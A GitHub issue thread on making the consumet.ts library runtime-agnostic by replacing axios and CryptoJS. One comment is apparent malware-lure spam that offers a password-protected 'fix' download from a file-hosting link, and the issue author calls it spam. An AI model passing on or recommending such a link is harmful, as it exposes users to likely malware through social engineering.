### ISSUE TITLE
Make this library runtime agnostic so can be deployed anywhere cf workers, edge etc.

### ISSUE THREAD

**Issue by theetherGit** [consumet/consumet.ts#580]
**Is your feature request related to a problem? Please describe.**
We can't use this library if we wanna deploy on edge or lambda function which doesn't have node runtime.

**Describe the solution you'd like**
Axios is main reason as of now, you can add axios fetch adapter so we can use axios in any JS runtime.
CryptoJS can be dropped as all runtimes have Crypto JS standard library.

**Describe alternatives you've considered**
Replacing axios completely.

**Additional context**
None

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by theetherGit** [comment]
@ahmar7 @NikhilKumar77777 Stop spamming. `gcc` is related to this? Do not try to mess here `fair warning`.

Btw https://github.com/consumet/consumet.ts/pull/370 already did this, just skipped from my eyes when i was looking for an implementation.
